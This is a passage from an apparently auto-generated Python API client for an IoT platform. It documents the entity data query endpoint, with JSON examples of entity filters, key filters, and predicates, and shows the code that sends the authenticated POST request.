\"d521edb0-2a7a-11ec-94eb-213c95f54092\", \"entityType\": \"DEVICE\" } } ``` ## Entity List Filter Allows to filter entities of the same type using their ids. For example, this entity filter selects two devices: ```json { \"type\": \"entityList\", \"entityType\": \"DEVICE\", \"entityList\": [ \"e6501f30-2a7a-11ec-94eb-213c95f54092\", \"e6657bf0-2a7a-11ec-94eb-213c95f54092\" ] } ``` ## Entity Name Filter Allows to filter entities of the same type using the **'starts with'** expression over the entity name.
        For example, this entity filter selects all devices whose name starts with 'Air Quality': ```json { \"type\": \"entityName\", \"entityType\": \"DEVICE\", \"entityNameFilter\": \"Air Quality\" } ``` ## Entity Type Filter Allows to filter entities based on their type (CUSTOMER, USER, DASHBOARD, ASSET, DEVICE, etc.). For example, this entity filter selects all tenant customers: ```json { \"type\": \"entityType\", \"entityType\": \"CUSTOMER\" } ``` ## Asset Type Filter Allows to filter assets based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'charging station' assets whose name starts with 'Tesla': ```json { \"type\": \"assetType\", \"assetType\": \"charging station\", \"assetNameFilter\": \"Tesla\" } ``` ## Device Type Filter Allows to filter devices based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Temperature Sensor' devices whose name starts with 'ABC': ```json { \"type\": \"deviceType\", \"deviceType\": \"Temperature Sensor\", \"deviceNameFilter\": \"ABC\" } ``` ## Edge Type Filter Allows to filter edge instances based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Factory' edge instances whose name starts with 'Nevada': ```json { \"type\": \"edgeType\", \"edgeType\": \"Factory\", \"edgeNameFilter\": \"Nevada\" } ``` ## Entity View Filter Allows to filter entity views based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Concrete Mixer' entity views whose name starts with 'CAT': ```json { \"type\": \"entityViewType\", \"entityViewType\": \"Concrete Mixer\", \"entityViewNameFilter\": \"CAT\" } ``` ## Api Usage Filter Allows to query for Api Usage based on an optional customer id.
        If the customer id is not set, returns the current tenant API usage. For example, this entity filter selects the 'Api Usage' entity for the customer with id 'd521edb0-2a7a-11ec-94eb-213c95f54092': ```json { \"type\": \"apiUsageState\", \"customerId\": { \"id\": \"d521edb0-2a7a-11ec-94eb-213c95f54092\", \"entityType\": \"CUSTOMER\" } } ``` ## Relations Query Filter Allows to filter entities that are related to the provided root entity. Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels the query should search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines whether to return all related entities or only entities on the last level of relations. The 'filter' object allows you to define the relation type and the set of acceptable entity types to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only those that match the 'filters'. For example, this entity filter selects all devices and assets that are related to the asset with id 'e51de0c0-2a7a-11ec-94eb-213c95f54092': ```json { \"type\": \"relationsQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e51de0c0-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 1, \"fetchLastLevelOnly\": false, \"filters\": [ { \"relationType\": \"Contains\", \"entityTypes\": [ \"DEVICE\", \"ASSET\" ] } ] } ``` ## Asset Search Query Allows to filter assets that are related to the provided root entity. Filters related assets based on the relation type and a set of asset types. Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels the query should search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines whether to return all related entities or only entities on the last level of relations. The 'relationType' defines the type of the relation to search for.
        The 'assetTypes' defines the types of the assets to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only assets that match the 'relationType' and 'assetTypes' conditions. For example, this entity filter selects 'charging station' assets that are related to the asset with id 'e51de0c0-2a7a-11ec-94eb-213c95f54092' using the 'Contains' relation: ```json { \"type\": \"assetSearchQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e51de0c0-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 1, \"fetchLastLevelOnly\": false, \"relationType\": \"Contains\", \"assetTypes\": [ \"charging station\" ] } ``` ## Device Search Query Allows to filter devices that are related to the provided root entity. Filters related devices based on the relation type and a set of device types. Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels the query should search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines whether to return all related entities or only entities on the last level of relations. The 'relationType' defines the type of the relation to search for. The 'deviceTypes' defines the types of the devices to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only devices that match the 'relationType' and 'deviceTypes' conditions.
        For example, this entity filter selects 'Charging port' and 'Air Quality Sensor' devices that are related to the asset with id 'e52b0020-2a7a-11ec-94eb-213c95f54092' using the 'Contains' relation: ```json { \"type\": \"deviceSearchQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e52b0020-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 2, \"fetchLastLevelOnly\": true, \"relationType\": \"Contains\", \"deviceTypes\": [ \"Air Quality Sensor\", \"Charging port\" ] } ``` ## Entity View Query Allows to filter entity views that are related to the provided root entity. Filters related entity views based on the relation type and a set of entity view types. Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels the query should search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines whether to return all related entities or only entities on the last level of relations. The 'relationType' defines the type of the relation to search for. The 'entityViewTypes' defines the types of the entity views to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only entity views that match the 'relationType' and 'entityViewTypes' conditions. For example, this entity filter selects 'Concrete mixer' entity views that are related to the asset with id 'e52b0020-2a7a-11ec-94eb-213c95f54092' using the 'Contains' relation: ```json { \"type\": \"entityViewSearchQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e52b0020-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 1, \"fetchLastLevelOnly\": false, \"relationType\": \"Contains\", \"entityViewTypes\": [ \"Concrete mixer\" ] } ``` ## Edge Search Query Allows to filter edge instances that are related to the provided root entity. Filters related edge instances based on the relation type and a set of edge types.
        Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels the query should search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines whether to return all related entities or only entities on the last level of relations. The 'relationType' defines the type of the relation to search for. The 'edgeTypes' defines the types of the edge instances to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only edge instances that match the 'relationType' and 'edgeTypes' conditions. For example, this entity filter selects 'Factory' edge instances that are related to the asset with id 'e52b0020-2a7a-11ec-94eb-213c95f54092' using the 'Contains' relation: ```json { \"type\": \"edgeSearchQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e52b0020-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 2, \"fetchLastLevelOnly\": true, \"relationType\": \"Contains\", \"edgeTypes\": [ \"Factory\" ] } ``` # Key Filters A key filter allows you to define complex logical expressions over an entity field, attribute or latest time-series value. The filter is defined using 'key', 'valueType' and 'predicate' objects. A single entity query may have zero, one or multiple key filters. If multiple filters are defined, they are evaluated using logical 'AND'. The example below checks that the temperature of the entity is above 20 degrees: ```json { \"key\": { \"type\": \"TIME_SERIES\", \"key\": \"temperature\" }, \"valueType\": \"NUMERIC\", \"predicate\": { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 20, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } } ``` Now let's review the 'key', 'valueType' and 'predicate' objects in detail. ## Filter Key The filter key defines either an entity field, attribute or telemetry key. It is a JSON object that consists of the key name and type.
        The following filter key types are supported: * 'CLIENT_ATTRIBUTE' - used for client attributes; * 'SHARED_ATTRIBUTE' - used for shared attributes; * 'SERVER_ATTRIBUTE' - used for server attributes; * 'ATTRIBUTE' - used for any of the above; * 'TIME_SERIES' - used for time-series values; * 'ENTITY_FIELD' - used for accessing entity fields like 'name', 'label', etc. The list of available fields depends on the entity type; * 'ALARM_FIELD' - similar to entity field, but is used in alarm queries only. Let's review the example: ```json { \"type\": \"TIME_SERIES\", \"key\": \"temperature\" } ``` ## Value Type and Operations Provides a hint about the data type of the entity field that is defined in the filter key. The value type impacts the list of possible operations that you may use in the corresponding predicate. For example, you may use 'STARTS_WITH' or 'ENDS_WITH', but you can't use 'GREATER_OR_EQUAL' for string values. The following filter value types and corresponding predicate operations are supported: * 'STRING' - used to filter any 'String' or 'JSON' values. Operations: EQUAL, NOT_EQUAL, STARTS_WITH, ENDS_WITH, CONTAINS, NOT_CONTAINS; * 'NUMERIC' - used for 'Long' and 'Double' values. Operations: EQUAL, NOT_EQUAL, GREATER, LESS, GREATER_OR_EQUAL, LESS_OR_EQUAL; * 'BOOLEAN' - used for boolean values. Operations: EQUAL, NOT_EQUAL; * 'DATE_TIME' - similar to numeric, transforms the value to milliseconds since epoch. Operations: EQUAL, NOT_EQUAL, GREATER, LESS, GREATER_OR_EQUAL, LESS_OR_EQUAL. ## Filter Predicate The filter predicate defines the logical expression to evaluate. The list of available operations depends on the filter value type, see above. The platform supports 4 predicate types: 'STRING', 'NUMERIC', 'BOOLEAN' and 'COMPLEX'. The last one allows to combine multiple operations over one filter key.
        Simple predicate example to check 'value < 100': ```json { \"operation\": \"LESS\", \"value\": { \"defaultValue\": 100, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } ``` Complex predicate example, to check 'value < 10 or value > 20': ```json { \"type\": \"COMPLEX\", \"operation\": \"OR\", \"predicates\": [ { \"operation\": \"LESS\", \"value\": { \"defaultValue\": 10, \"dynamicValue\": null }, \"type\": \"NUMERIC\" }, { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 20, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } ] } ``` More complex predicate example, to check 'value < 10 or (value > 50 && value < 60)': ```json { \"type\": \"COMPLEX\", \"operation\": \"OR\", \"predicates\": [ { \"operation\": \"LESS\", \"value\": { \"defaultValue\": 10, \"dynamicValue\": null }, \"type\": \"NUMERIC\" }, { \"type\": \"COMPLEX\", \"operation\": \"AND\", \"predicates\": [ { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 50, \"dynamicValue\": null }, \"type\": \"NUMERIC\" }, { \"operation\": \"LESS\", \"value\": { \"defaultValue\": 60, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } ] } ] } ``` You may also want to replace hardcoded values (for example, temperature > 20) with a more dynamic expression (for example, temperature > value of the tenant attribute with key 'temperatureThreshold'). It is possible to use 'dynamicValue' to define an attribute of the tenant, customer or user that is performing the API call. See the example below: ```json { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 0, \"dynamicValue\": { \"sourceType\": \"CURRENT_USER\", \"sourceAttribute\": \"temperatureThreshold\" } }, \"type\": \"NUMERIC\" } ``` Note that you may use 'CURRENT_USER', 'CURRENT_CUSTOMER' and 'CURRENT_TENANT' as the 'sourceType'. The 'defaultValue' is used when the attribute with such a name is not defined for the chosen source. Available for users with 'TENANT_ADMIN' or 'CUSTOMER_USER' authority.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.find_entity_data_by_query_using_post(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param EntityDataQuery body:
        :return: PageDataEntityData
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.find_entity_data_by_query_using_post_with_http_info(**kwargs)  # noqa: E501
        else:
            (data) = self.find_entity_data_by_query_using_post_with_http_info(**kwargs)  # noqa: E501
            return data
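The key-filter predicate semantics spelled out in the docstring above (NUMERIC comparison operations combined with 'COMPLEX' AND/OR predicates) can be sketched as a tiny evaluator. This is an illustration only, not part of the generated client; it handles NUMERIC operations and ignores 'dynamicValue' resolution:

```python
# Simplified evaluator for the key-filter predicates described in the
# docstring above. Covers NUMERIC comparison predicates and COMPLEX
# AND/OR combinations; 'dynamicValue' resolution is out of scope here.
_NUMERIC_OPS = {
    "EQUAL": lambda v, t: v == t,
    "NOT_EQUAL": lambda v, t: v != t,
    "GREATER": lambda v, t: v > t,
    "LESS": lambda v, t: v < t,
    "GREATER_OR_EQUAL": lambda v, t: v >= t,
    "LESS_OR_EQUAL": lambda v, t: v <= t,
}

def evaluate_predicate(predicate, value):
    """Return True if `value` satisfies the (possibly nested) predicate."""
    if predicate["type"] == "COMPLEX":
        results = (evaluate_predicate(p, value) for p in predicate["predicates"])
        return all(results) if predicate["operation"] == "AND" else any(results)
    threshold = predicate["value"]["defaultValue"]  # dynamicValue ignored
    return _NUMERIC_OPS[predicate["operation"]](value, threshold)

# The 'value < 10 or (value > 50 && value < 60)' example from the docstring:
pred = {
    "type": "COMPLEX", "operation": "OR",
    "predicates": [
        {"operation": "LESS",
         "value": {"defaultValue": 10, "dynamicValue": None}, "type": "NUMERIC"},
        {"type": "COMPLEX", "operation": "AND",
         "predicates": [
             {"operation": "GREATER",
              "value": {"defaultValue": 50, "dynamicValue": None}, "type": "NUMERIC"},
             {"operation": "LESS",
              "value": {"defaultValue": 60, "dynamicValue": None}, "type": "NUMERIC"},
         ]},
    ],
}
```

On the server these predicates are translated into SQL, but the boolean semantics match this sketch: multiple key filters are AND-ed, and a COMPLEX predicate combines its children with the stated AND/OR operation.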

    def find_entity_data_by_query_using_post_with_http_info(self, **kwargs):  # noqa: E501
        """Find Entity Data by Query  # noqa: E501

        Allows to run complex queries over platform entities (devices, assets, customers, etc.) based on the combination of the main entity filter and multiple key filters. Returns the paginated result of the query that contains the requested entity fields and latest values of the requested attributes and time-series data. # Query Definition The main **entity filter** is mandatory and defines generic search criteria. For example, \"find all devices with profile 'Moisture Sensor'\" or \"find all devices related to asset 'Building A'\". Optional **key filters** allow to filter the results of the **entity filter** by complex criteria against main entity fields (name, label, type, etc.), attributes and telemetry. For example, \"temperature > 20 or temperature < 10\" or \"name starts with 'T', and attribute 'model' is 'T1000', and time-series field 'batteryLevel' > 40\". The **entity fields** and **latest values** contain the lists of entity fields and latest attribute/telemetry fields to fetch for each entity. The **page link** contains information about the page to fetch and the sort ordering.
        Let's review the example: ```json { \"entityFilter\": { \"type\": \"entityType\", \"resolveMultiple\": true, \"entityType\": \"DEVICE\" }, \"keyFilters\": [ { \"key\": { \"type\": \"TIME_SERIES\", \"key\": \"temperature\" }, \"valueType\": \"NUMERIC\", \"predicate\": { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 0, \"dynamicValue\": { \"sourceType\": \"CURRENT_USER\", \"sourceAttribute\": \"temperatureThreshold\", \"inherit\": false } }, \"type\": \"NUMERIC\" } } ], \"entityFields\": [ { \"type\": \"ENTITY_FIELD\", \"key\": \"name\" }, { \"type\": \"ENTITY_FIELD\", \"key\": \"label\" }, { \"type\": \"ENTITY_FIELD\", \"key\": \"additionalInfo\" } ], \"latestValues\": [ { \"type\": \"ATTRIBUTE\", \"key\": \"model\" }, { \"type\": \"TIME_SERIES\", \"key\": \"temperature\" } ], \"pageLink\": { \"page\": 0, \"pageSize\": 10, \"sortOrder\": { \"key\": { \"key\": \"name\", \"type\": \"ENTITY_FIELD\" }, \"direction\": \"ASC\" } } } ``` The example above searches for all devices whose latest 'temperature' reading is greater than the value of the current user's 'temperatureThreshold' attribute (or the default value 0 if that attribute is not set), and fetches their 'name', 'label' and 'additionalInfo' entity fields together with the latest 'model' attribute and 'temperature' reading. Now let's review the available entity filter and key filter syntax: # Entity Filters The entity filter body depends on the 'type' parameter. Let's review the available entity filter types. In fact, they correspond to the available dashboard aliases. ## Single Entity Allows to filter only one entity based on the id. For example, this entity filter selects a certain device: ```json { \"type\": \"singleEntity\", \"singleEntity\": { \"id\": \"d521edb0-2a7a-11ec-94eb-213c95f54092\", \"entityType\": \"DEVICE\" } } ``` ## Entity List Filter Allows to filter entities of the same type using their ids. For example, this entity filter selects two devices: ```json { \"type\": \"entityList\", \"entityType\": \"DEVICE\", \"entityList\": [ \"e6501f30-2a7a-11ec-94eb-213c95f54092\", \"e6657bf0-2a7a-11ec-94eb-213c95f54092\" ] } ``` ## Entity Name Filter Allows to filter entities of the same type using the **'starts with'** expression over the entity name.
        For example, this entity filter selects all devices whose name starts with 'Air Quality': ```json { \"type\": \"entityName\", \"entityType\": \"DEVICE\", \"entityNameFilter\": \"Air Quality\" } ``` ## Entity Type Filter Allows to filter entities based on their type (CUSTOMER, USER, DASHBOARD, ASSET, DEVICE, etc.). For example, this entity filter selects all tenant customers: ```json { \"type\": \"entityType\", \"entityType\": \"CUSTOMER\" } ``` ## Asset Type Filter Allows to filter assets based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'charging station' assets whose name starts with 'Tesla': ```json { \"type\": \"assetType\", \"assetType\": \"charging station\", \"assetNameFilter\": \"Tesla\" } ``` ## Device Type Filter Allows to filter devices based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Temperature Sensor' devices whose name starts with 'ABC': ```json { \"type\": \"deviceType\", \"deviceType\": \"Temperature Sensor\", \"deviceNameFilter\": \"ABC\" } ``` ## Edge Type Filter Allows to filter edge instances based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Factory' edge instances whose name starts with 'Nevada': ```json { \"type\": \"edgeType\", \"edgeType\": \"Factory\", \"edgeNameFilter\": \"Nevada\" } ``` ## Entity View Filter Allows to filter entity views based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Concrete Mixer' entity views whose name starts with 'CAT': ```json { \"type\": \"entityViewType\", \"entityViewType\": \"Concrete Mixer\", \"entityViewNameFilter\": \"CAT\" } ``` ## Api Usage Filter Allows to query for Api Usage based on an optional customer id.
        If the customer id is not set, returns the current tenant API usage. For example, this entity filter selects the 'Api Usage' entity for the customer with id 'd521edb0-2a7a-11ec-94eb-213c95f54092': ```json { \"type\": \"apiUsageState\", \"customerId\": { \"id\": \"d521edb0-2a7a-11ec-94eb-213c95f54092\", \"entityType\": \"CUSTOMER\" } } ``` ## Relations Query Filter Allows to filter entities that are related to the provided root entity. Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels the query should search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines whether to return all related entities or only entities on the last level of relations. The 'filter' object allows you to define the relation type and the set of acceptable entity types to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only those that match the 'filters'. For example, this entity filter selects all devices and assets that are related to the asset with id 'e51de0c0-2a7a-11ec-94eb-213c95f54092': ```json { \"type\": \"relationsQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e51de0c0-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 1, \"fetchLastLevelOnly\": false, \"filters\": [ { \"relationType\": \"Contains\", \"entityTypes\": [ \"DEVICE\", \"ASSET\" ] } ] } ``` ## Asset Search Query Allows to filter assets that are related to the provided root entity. Filters related assets based on the relation type and a set of asset types. Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels the query should search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines whether to return all related entities or only entities on the last level of relations. The 'relationType' defines the type of the relation to search for.
The 'assetTypes' defines the type of the asset to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only assets that match 'relationType' and 'assetTypes' conditions. For example, this entity filter selects 'charging station' assets which are related to the asset with id 'e51de0c0-2a7a-11ec-94eb-213c95f54092' using 'Contains' relation: ```json { \"type\": \"assetSearchQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e51de0c0-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 1, \"fetchLastLevelOnly\": false, \"relationType\": \"Contains\", \"assetTypes\": [ \"charging station\" ] } ``` ## Device Search Query Allows to filter devices that are related to the provided root entity. Filters related devices based on the relation type and set of device types. Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels should the query search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines either to return all related entities or only entities that are on the last level of relations. The 'relationType' defines the type of the relation to search for. The 'deviceTypes' defines the type of the device to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only devices that match 'relationType' and 'deviceTypes' conditions. 
For example, this entity filter selects 'Charging port' and 'Air Quality Sensor' devices which are related to the asset with id 'e52b0020-2a7a-11ec-94eb-213c95f54092' using 'Contains' relation: ```json { \"type\": \"deviceSearchQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e52b0020-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 2, \"fetchLastLevelOnly\": true, \"relationType\": \"Contains\", \"deviceTypes\": [ \"Air Quality Sensor\", \"Charging port\" ] } ``` ## Entity View Query Allows to filter entity views that are related to the provided root entity. Filters related entity views based on the relation type and set of entity view types. Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels should the query search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines either to return all related entities or only entities that are on the last level of relations. The 'relationType' defines the type of the relation to search for. The 'entityViewTypes' defines the type of the entity view to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only devices that match 'relationType' and 'deviceTypes' conditions. For example, this entity filter selects 'Concrete mixer' entity views which are related to the asset with id 'e52b0020-2a7a-11ec-94eb-213c95f54092' using 'Contains' relation: ```json { \"type\": \"entityViewSearchQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e52b0020-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 1, \"fetchLastLevelOnly\": false, \"relationType\": \"Contains\", \"entityViewTypes\": [ \"Concrete mixer\" ] } ``` ## Edge Search Query Allows to filter edge instances that are related to the provided root entity. Filters related edge instances based on the relation type and set of edge types. 
Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels the query should search recursively. Assuming 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines whether to return all related entities or only the entities on the last level of relations. The 'relationType' defines the type of the relation to search for. The 'edgeTypes' defines the type of the edge to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only edge instances that match the 'relationType' and 'edgeTypes' conditions. For example, this entity filter selects 'Factory' edge instances that are related to the asset with id 'e52b0020-2a7a-11ec-94eb-213c95f54092' using the 'Contains' relation: ```json { \"type\": \"edgeSearchQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e52b0020-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 2, \"fetchLastLevelOnly\": true, \"relationType\": \"Contains\", \"edgeTypes\": [ \"Factory\" ] } ``` # Key Filters A key filter allows you to define complex logical expressions over an entity field, attribute, or latest time-series value. The filter is defined using 'key', 'valueType' and 'predicate' objects. A single entity query may have zero, one, or multiple key filters. If multiple filters are defined, they are evaluated using logical 'AND'. The example below checks that the temperature of the entity is above 20 degrees: ```json { \"key\": { \"type\": \"TIME_SERIES\", \"key\": \"temperature\" }, \"valueType\": \"NUMERIC\", \"predicate\": { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 20, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } } ``` Now let's review the 'key', 'valueType' and 'predicate' objects in detail. ## Filter Key The filter key defines either an entity field, an attribute, or telemetry. It is a JSON object that consists of the key name and type. 
The following filter key types are supported: * 'CLIENT_ATTRIBUTE' - used for client attributes; * 'SHARED_ATTRIBUTE' - used for shared attributes; * 'SERVER_ATTRIBUTE' - used for server attributes; * 'ATTRIBUTE' - used for any of the above; * 'TIME_SERIES' - used for time-series values; * 'ENTITY_FIELD' - used for accessing entity fields like 'name', 'label', etc. The list of available fields depends on the entity type; * 'ALARM_FIELD' - similar to entity field, but is used in alarm queries only. Let's review an example: ```json { \"type\": \"TIME_SERIES\", \"key\": \"temperature\" } ``` ## Value Type and Operations Provides a hint about the data type of the entity field that is defined in the filter key. The value type impacts the list of possible operations that you may use in the corresponding predicate. For example, you may use 'STARTS_WITH' or 'ENDS_WITH', but you can't use 'GREATER_OR_EQUAL' for string values. The following filter value types and corresponding predicate operations are supported: * 'STRING' - used to filter any 'String' or 'JSON' values. Operations: EQUAL, NOT_EQUAL, STARTS_WITH, ENDS_WITH, CONTAINS, NOT_CONTAINS; * 'NUMERIC' - used for 'Long' and 'Double' values. Operations: EQUAL, NOT_EQUAL, GREATER, LESS, GREATER_OR_EQUAL, LESS_OR_EQUAL; * 'BOOLEAN' - used for boolean values. Operations: EQUAL, NOT_EQUAL; * 'DATE_TIME' - similar to numeric, transforms the value to milliseconds since epoch. Operations: EQUAL, NOT_EQUAL, GREATER, LESS, GREATER_OR_EQUAL, LESS_OR_EQUAL. ## Filter Predicate The filter predicate defines the logical expression to evaluate. The list of available operations depends on the filter value type, see above. The platform supports four predicate types: 'STRING', 'NUMERIC', 'BOOLEAN' and 'COMPLEX'. The last one allows combining multiple operations over one filter key. 
Simple predicate example to check 'value < 100': ```json { \"operation\": \"LESS\", \"value\": { \"defaultValue\": 100, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } ``` Complex predicate example to check 'value < 10 or value > 20': ```json { \"type\": \"COMPLEX\", \"operation\": \"OR\", \"predicates\": [ { \"operation\": \"LESS\", \"value\": { \"defaultValue\": 10, \"dynamicValue\": null }, \"type\": \"NUMERIC\" }, { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 20, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } ] } ``` More complex predicate example to check 'value < 10 or (value > 50 && value < 60)': ```json { \"type\": \"COMPLEX\", \"operation\": \"OR\", \"predicates\": [ { \"operation\": \"LESS\", \"value\": { \"defaultValue\": 10, \"dynamicValue\": null }, \"type\": \"NUMERIC\" }, { \"type\": \"COMPLEX\", \"operation\": \"AND\", \"predicates\": [ { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 50, \"dynamicValue\": null }, \"type\": \"NUMERIC\" }, { \"operation\": \"LESS\", \"value\": { \"defaultValue\": 60, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } ] } ] } ``` You may also want to replace hardcoded values (for example, temperature > 20) with a more dynamic expression (for example, temperature greater than the value of the tenant attribute with key 'temperatureThreshold'). It is possible to use 'dynamicValue' to reference an attribute of the tenant, customer or user that is performing the API call. See the example below: ```json { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 0, \"dynamicValue\": { \"sourceType\": \"CURRENT_USER\", \"sourceAttribute\": \"temperatureThreshold\" } }, \"type\": \"NUMERIC\" } ``` Note that you may use 'CURRENT_USER', 'CURRENT_CUSTOMER' and 'CURRENT_TENANT' as the 'sourceType'. The 'defaultValue' is used when an attribute with such a name is not defined for the chosen source. Available for users with 'TENANT_ADMIN' or 'CUSTOMER_USER' authority. # noqa: E501
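The key filter and predicate structures above can also be assembled programmatically before being sent as part of the query body. A minimal sketch using plain Python dicts (the helper name `numeric_predicate` is illustrative and not part of this client):

```python
def numeric_predicate(operation, default_value, dynamic_value=None):
    # Build a NUMERIC key-filter predicate as a plain dict,
    # mirroring the JSON shape shown in the examples above.
    return {
        "operation": operation,
        "value": {"defaultValue": default_value, "dynamicValue": dynamic_value},
        "type": "NUMERIC",
    }

# 'temperature greater than the temperatureThreshold attribute of the
# current user, falling back to 0 when the attribute is undefined'
predicate = numeric_predicate(
    "GREATER",
    0,
    {"sourceType": "CURRENT_USER", "sourceAttribute": "temperatureThreshold"},
)

key_filter = {
    "key": {"type": "TIME_SERIES", "key": "temperature"},
    "valueType": "NUMERIC",
    "predicate": predicate,
}
```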
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_entity_data_by_query_using_post_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param EntityDataQuery body:
:return: PageDataEntityData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method find_entity_data_by_query_using_post" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/entitiesQuery/find', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageDataEntityData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
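As a usage illustration for the method above: the request body is an EntityDataQuery whose 'entityFilter' can be any of the filters documented in the docstring. The sketch below reuses the device search query example from that documentation; the 'pageLink' and 'entityFields' envelope fields and the commented-out client wiring are assumptions, not confirmed API details.

```python
# The entityFilter below is the device search query example from the
# docstring; the surrounding envelope (entityFields, pageLink) is an
# assumed minimal shape for an EntityDataQuery.
entity_data_query = {
    "entityFilter": {
        "type": "deviceSearchQuery",
        "rootEntity": {"entityType": "ASSET",
                       "id": "e52b0020-2a7a-11ec-94eb-213c95f54092"},
        "direction": "FROM",
        "maxLevel": 2,
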